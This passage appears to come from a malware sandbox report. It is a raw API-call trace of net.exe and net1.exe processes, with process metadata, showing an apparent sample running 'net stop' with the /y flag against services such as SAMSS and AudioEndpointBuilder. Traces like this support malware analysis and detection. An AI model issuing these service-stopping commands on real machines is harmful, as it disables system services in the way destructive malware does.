_String2="WORKSTATION") returned -4 [0144.049] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0144.049] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0144.049] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0144.049] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0144.049] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0144.049] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0144.049] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0144.049] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0144.049] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0144.049] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0144.049] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0144.049] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0144.049] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0144.049] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0144.050] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0144.050] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0144.050] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0144.050] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0144.050] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0144.050] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0144.050] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0144.050] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0144.050] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0144.050] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0144.050] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0144.050] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0144.050] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0144.050] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0144.050] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0144.050] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0144.050] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0144.050] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0144.050] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0144.050] wcsncpy_s (in: _Destination=0x29004ec, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0144.050] wcsncpy_s (in: _Destination=0x29004e0, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0144.050] NetApiBufferFree (Buffer=0x28f2d98) returned 0x0 [0144.050] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x287f6dc | out: Buffer=0x287f6dc*=0x2902038) returned 0x0 [0144.050] OpenServiceW (hSCManager=0x29007a8, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x2900668 [0144.050] QueryServiceStatus (in: hService=0x2900668, lpServiceStatus=0x287f6e0 | out: lpServiceStatus=0x287f6e0*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0144.094] NetApiBufferFree (Buffer=0x2902038) returned 0x0 [0144.094] CloseServiceHandle (hSCObject=0x2900668) returned 1 [0144.095] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0144.095] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x25e0002 [0144.124] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x25e0002, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0144.126] GetFileType (hFile=0x94) returned 0x2 [0144.126] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x287f618 | out: lpMode=0x287f618) returned 1 [0144.564] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x287f624, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x287f624*=0x47) returned 1 [0144.970] GetFileType (hFile=0x94) returned 0x2 [0144.970] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x287f618 | out: lpMode=0x287f618) returned 1 [0145.198] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x287f624, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x287f624*=0x2) returned 1 [0145.772] _ultow (in: _Dest=0x88f, _Radix=42464876 | out: _Dest=0x88f) returned="2191" [0145.772] FormatMessageW (in: dwFlags=0x2800, lpSource=0x25e0002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0145.773] GetFileType (hFile=0x94) returned 0x2 [0145.773] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x287f63c | out: lpMode=0x287f63c) returned 1 [0146.217] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x287f648, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x287f648*=0x34) returned 1 [0146.438] GetFileType (hFile=0x94) returned 0x2 [0146.438] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x287f63c | out: lpMode=0x287f63c) returned 1 [0146.662] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x287f648, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x287f648*=0x2) returned 1 [0147.222] NetApiBufferFree (Buffer=0x28f83f8) returned 0x0 [0147.224] NetApiBufferFree (Buffer=0x28f84a0) returned 0x0 [0147.224] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0147.224] exit (_Code=2) Thread: id = 380 os_tid = 0x1544 Process: id = "25" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2aa97000" os_pid = "0x7f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x1268" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 284 os_tid = 0xf4 Thread: id = 303 os_tid = 0x1410 Thread: id = 354 os_tid = 0x14dc Thread: id = 445 os_tid = 0x1614 Thread: id = 446 os_tid = 0x1654 Process: id = "26" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1df70000" os_pid = "0x1758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 511 os_tid = 0x175c Thread: id = 626 os_tid = 0x192c Process: id = "27" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x117c8000" os_pid = "0x1810" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1758" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 559 os_tid = 0x1814 Thread: id = 560 os_tid = 0x1818 Thread: id = 563 os_tid = 0x1828 Thread: id = 564 os_tid = 0x182c Thread: id = 590 os_tid = 0x189c Process: id = "28" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6e095000" os_pid = "0x181c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x1268" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 561 os_tid = 0x1820 [0146.660] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0146.660] __set_app_type (_Type=0x1) [0146.660] __p__fmode () returned 0x76953c14 [0146.660] __p__commode () returned 0x769549ec [0146.660] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0146.660] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0146.660] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.660] GetConsoleOutputCP () returned 0x1b5 [0147.213] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0147.213] SetThreadUILanguage (LangId=0x0) returned 0x2cd0409 [0147.588] sprintf_s (in: _DstBuf=0x2ebfbcc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0147.588] setlocale (category=0, locale=".437") returned="English_United States.437" [0147.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0147.589] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0147.589] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" [0147.589] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ebf974, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0147.589] RtlAllocateHeap (HeapHandle=0x2fa0000, Flags=0x0, Size=0x7c) returned 0x2fa4450 [0147.589] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0147.589] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ebf970 | out: Buffer=0x2ebf970*=0x2fa7d48) returned 0x0 [0147.590] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ebf96c | out: Buffer=0x2ebf96c*=0x2fa7d60) returned 0x0 [0147.590] __iob_func () returned 0x76952608 [0147.590] _fileno (_File=0x76952608) returned 0 [0147.590] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0147.590] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0147.590] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0147.590] _wcsicmp (_String1="config", _String2="stop") returned -16 [0147.590] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0147.590] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0147.590] _wcsicmp (_String1="file", _String2="stop") returned -13 [0147.590] _wcsicmp (_String1="files", _String2="stop") returned -13 [0147.590] _wcsicmp (_String1="group", _String2="stop") returned -12 [0147.590] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0147.590] _wcsicmp (_String1="help", _String2="stop") returned -11 [0147.590] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0147.590] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0147.590] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0147.590] _wcsicmp (_String1="session", _String2="stop") returned -15 [0147.590] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0147.590] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0147.590] _wcsicmp (_String1="share", _String2="stop") returned -12 [0147.590] _wcsicmp (_String1="start", _String2="stop") returned -14 [0147.590] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0147.590] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0147.590] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0147.590] _wcsicmp (_String1="accounts", _String2="audioendpointbuilder") returned -18 [0147.590] _wcsicmp (_String1="computer", _String2="audioendpointbuilder") returned 2 [0147.590] _wcsicmp (_String1="config", _String2="audioendpointbuilder") returned 2 [0147.590] _wcsicmp (_String1="continue", _String2="audioendpointbuilder") returned 2 [0147.590] _wcsicmp (_String1="cont", _String2="audioendpointbuilder") returned 2 [0147.590] _wcsicmp (_String1="file", _String2="audioendpointbuilder") returned 5 [0147.590] _wcsicmp (_String1="files", _String2="audioendpointbuilder") returned 5 [0147.591] _wcsicmp (_String1="group", _String2="audioendpointbuilder") returned 6 [0147.591] _wcsicmp (_String1="groups", _String2="audioendpointbuilder") returned 6 [0147.591] _wcsicmp (_String1="help", _String2="audioendpointbuilder") returned 7 [0147.591] _wcsicmp (_String1="helpmsg", _String2="audioendpointbuilder") returned 7 [0147.591] _wcsicmp (_String1="localgroup", _String2="audioendpointbuilder") returned 11 [0147.591] _wcsicmp (_String1="pause", _String2="audioendpointbuilder") returned 15 [0147.591] _wcsicmp (_String1="session", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="sessions", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="sess", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="share", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="start", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="stats", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="statistics", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="stop", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="time", _String2="audioendpointbuilder") returned 19 [0147.591] _wcsicmp (_String1="user", _String2="audioendpointbuilder") returned 20 [0147.591] _wcsicmp (_String1="users", _String2="audioendpointbuilder") returned 20 [0147.591] _wcsicmp (_String1="msg", _String2="audioendpointbuilder") returned 12 [0147.591] _wcsicmp (_String1="messenger", _String2="audioendpointbuilder") returned 12 [0147.591] _wcsicmp (_String1="receiver", _String2="audioendpointbuilder") returned 17 [0147.591] _wcsicmp (_String1="rcv", _String2="audioendpointbuilder") returned 17 [0147.591] _wcsicmp (_String1="netpopup", _String2="audioendpointbuilder") returned 13 [0147.591] _wcsicmp (_String1="redirector", _String2="audioendpointbuilder") returned 17 [0147.591] _wcsicmp (_String1="redir", _String2="audioendpointbuilder") returned 17 [0147.591] _wcsicmp (_String1="rdr", _String2="audioendpointbuilder") returned 17 [0147.591] _wcsicmp (_String1="workstation", _String2="audioendpointbuilder") returned 22 [0147.591] _wcsicmp (_String1="work", _String2="audioendpointbuilder") returned 22 [0147.591] _wcsicmp (_String1="wksta", _String2="audioendpointbuilder") returned 22 [0147.591] _wcsicmp (_String1="prdr", _String2="audioendpointbuilder") returned 15 [0147.591] _wcsicmp (_String1="devrdr", _String2="audioendpointbuilder") returned 3 [0147.591] _wcsicmp (_String1="lanmanworkstation", _String2="audioendpointbuilder") returned 11 [0147.591] _wcsicmp (_String1="server", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="svr", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="srv", _String2="audioendpointbuilder") returned 18 [0147.591] _wcsicmp (_String1="lanmanserver", _String2="audioendpointbuilder") returned 11 [0147.591] _wcsicmp (_String1="alerter", _String2="audioendpointbuilder") returned -9 [0147.591] _wcsicmp (_String1="netlogon", _String2="audioendpointbuilder") returned 13 [0147.592] _wcsupr (in: _String="audioendpointbuilder" | out: _String="AUDIOENDPOINTBUILDER") returned="AUDIOENDPOINTBUILDER" [0147.592] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2fb0878 [0147.595] GetServiceKeyNameW (in: hSCManager=0x2fb0878, lpDisplayName="AUDIOENDPOINTBUILDER", lpServiceName=0x2c8c28, lpcchBuffer=0x2ebf8e4 | out: lpServiceName="", lpcchBuffer=0x2ebf8e4) returned 0 [0147.596] _wcsicmp (_String1="msg", _String2="AUDIOENDPOINTBUILDER") returned 12 [0147.596] _wcsicmp (_String1="messenger", _String2="AUDIOENDPOINTBUILDER") returned 12 [0147.596] _wcsicmp (_String1="receiver", _String2="AUDIOENDPOINTBUILDER") returned 17 [0147.596] _wcsicmp (_String1="rcv", _String2="AUDIOENDPOINTBUILDER") returned 17 [0147.596] _wcsicmp (_String1="redirector", _String2="AUDIOENDPOINTBUILDER") returned 17 [0147.596] _wcsicmp (_String1="redir", _String2="AUDIOENDPOINTBUILDER") returned 17 [0147.596] _wcsicmp (_String1="rdr", _String2="AUDIOENDPOINTBUILDER") returned 17 [0147.596] _wcsicmp (_String1="workstation", _String2="AUDIOENDPOINTBUILDER") returned 22 [0147.596] _wcsicmp (_String1="work", _String2="AUDIOENDPOINTBUILDER") returned 22 [0147.596] _wcsicmp (_String1="wksta", _String2="AUDIOENDPOINTBUILDER") returned 22 [0147.597] _wcsicmp (_String1="prdr", _String2="AUDIOENDPOINTBUILDER") returned 15 [0147.597] _wcsicmp (_String1="devrdr", _String2="AUDIOENDPOINTBUILDER") returned 3 [0147.597] _wcsicmp (_String1="lanmanworkstation", _String2="AUDIOENDPOINTBUILDER") returned 11 [0147.597] _wcsicmp (_String1="server", _String2="AUDIOENDPOINTBUILDER") returned 18 [0147.597] _wcsicmp (_String1="svr", _String2="AUDIOENDPOINTBUILDER") returned 18 [0147.597] _wcsicmp (_String1="srv", _String2="AUDIOENDPOINTBUILDER") returned 18 [0147.597] _wcsicmp (_String1="lanmanserver", _String2="AUDIOENDPOINTBUILDER") returned 11 [0147.597] _wcsicmp (_String1="alerter", _String2="AUDIOENDPOINTBUILDER") returned -9 [0147.597] _wcsicmp (_String1="netlogon", _String2="AUDIOENDPOINTBUILDER") returned 13 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0147.597] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0147.598] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0147.598] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0147.598] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0147.598] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0147.598] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0147.598] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2fb06c0 [0147.598] OpenServiceW (hSCManager=0x2fb06c0, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0x84) returned 0x2fb05a8 [0147.598] ResolveDelayLoadedAPI () returned 0x73f29e60 [0147.599] ControlService (in: hService=0x2fb05a8, dwControl=0x4, lpServiceStatus=0x2ebf860 | out: lpServiceStatus=0x2ebf860*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0xc1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0147.764] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x2fa8248 [0147.764] wcscpy_s (in: _Destination=0x2fa8264, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER" | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0147.764] CloseServiceHandle (hSCObject=0x2fb06c0) returned 1 [0147.764] CloseServiceHandle (hSCObject=0x2fb05a8) returned 1 [0147.764] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x2ebf844 | out: Buffer=0x2ebf844*=0x2fb02d0) returned 0x0 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0147.765] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0147.765] wcsncpy_s (in: _Destination=0x2fb0486, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0147.765] wcsncpy_s (in: _Destination=0x2fb045c, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0147.765] NetApiBufferFree (Buffer=0x2fa8248) returned 0x0 [0147.765] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x2ebf764 | out: Buffer=0x2ebf764*=0x2fb1ff0) returned 0x0 [0147.766] OpenServiceW 